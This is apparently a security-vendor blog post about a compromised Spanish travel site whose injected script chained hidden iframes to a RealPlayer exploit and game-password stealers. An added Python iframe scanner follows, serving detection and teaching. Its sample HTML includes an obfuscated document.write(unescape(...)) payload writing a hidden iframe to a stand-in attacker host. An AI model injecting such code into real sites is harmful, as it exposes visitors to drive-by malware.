Looking For Pyrenees Travel Info Unwittingly Leads Users to Malware
February 7th, 2008 by Macky Cruz (Technical Communications)
Yet another Web site compromise was discovered by Research Project Manager Ivan Macalintal, this time in Spain.
Spanish tourism and travel site Pyrenees Guide, which provides information on trips to the Pyrenees Mountains, has been discovered to be compromised and serving malicious code.

Examining the source code of the site’s main page, we find the following injected script:

The injected script loads a URL that, through a hidden iframe, leads to yet another URL carrying further malicious code. From there the chain branches to one of two malicious URLs, one of which attempts to exploit a vulnerability in RealPlayer. Initial analysis indicates that the redirections eventually lead to the download of a Trojan, which in turn downloads a configuration file listing several further files to fetch, among them dozens of MMORPG (Massively Multiplayer Online Role-Playing Game) password stealers (already detected as TSPY_ONLINEG.WN, TSPY_ONLINEG.DTQ, and TSPY_ONLINEG.CZX) and generic packers.
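As an added illustration (not part of the original post, and not the actual injected script, which is not reproduced here), the following Python scans a page's HTML for the kind of hidden, off-site iframe described above, including one that a script writes at runtime via document.write(unescape(...)). The sample page, the hostnames in it, and the helper names are all constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample page (hypothetical hosts), mimicking the pattern in the
# post: an injected script that writes a 1x1 hidden iframe pointing off-site,
# plus a legitimate on-site iframe and a second hidden off-site one.
SAMPLE_HTML = """<html><head><title>Guide</title>
<script type="text/javascript">
document.write(unescape('%3Ciframe%20src%3D%22http%3A//evil.example/in.cgi%3F3%22%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E'));
</script>
</head><body>
<iframe src="http://www.example.org/map" width="600" height="400"></iframe>
<iframe src="http://bad.example/x.html" style="display:none"></iframe>
</body></html>"""

# Matches unescape('...') / unescape("...") inside a script body.
_UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)


class _IframeCollector(HTMLParser):
    """Collects <iframe> attribute dicts and raw <script> bodies."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def _collect(html):
    p = _IframeCollector()
    p.feed(html)
    p.close()
    return p


def _is_hidden(attrs):
    """True for display:none / visibility:hidden or a 0x0 / 1x1 frame."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for dim in ("width", "height"):
        value = (attrs.get(dim) or "").strip().lower().rstrip("px")
        if value.isdigit() and int(value) <= 1:
            return True
    return False


def find_suspicious_iframes(html, site_host):
    """Return iframes that are hidden, off-site, or emitted by an
    obfuscated document.write(unescape(...)) call.  site_host is the
    hostname the page is legitimately served from."""
    page = _collect(html)
    found = [(attrs, False) for attrs in page.iframes]
    # Decode percent-escaped script payloads and parse them as HTML too,
    # so a frame that only exists after the script runs is still seen.
    for body in page.scripts:
        for m in _UNESCAPE_RE.finditer(body):
            decoded = unquote(m.group(2))
            found.extend((attrs, True) for attrs in _collect(decoded).iframes)
    results = []
    for attrs, obfuscated in found:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname or site_host
        hidden = _is_hidden(attrs)
        offsite = host != site_host
        if hidden or offsite or obfuscated:
            results.append({"src": src, "host": host, "hidden": hidden,
                            "offsite": offsite, "obfuscated": obfuscated})
    return results


if __name__ == "__main__":
    for hit in find_suspicious_iframes(SAMPLE_HTML, "www.example.org"):
        print(hit)
```

Run against the sample with the site's own hostname as `site_host`, it reports the display:none frame and the percent-encoded 1x1 frame and ignores the visible on-site map frame. The decoding step is deliberately narrow (only `unescape` of a string literal); real injections often add further layers such as `eval` or string concatenation, so treat this as a first-pass triage check, not a complete deobfuscator.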
Trend Micro Web Threat Protection protects users from this attack by proactively blocking the related URLs and detecting the files that the attack attempts to download onto the system.
Additional Note: Advanced Threats Researcher Paul Ferguson (a.k.a. “Fergie”) has alerted the domain technical contact (email bounced), the IP owner contact, and the CCN-CERT (Spanish Governmental National Cryptology Center - Computer Security Incident Response Team).
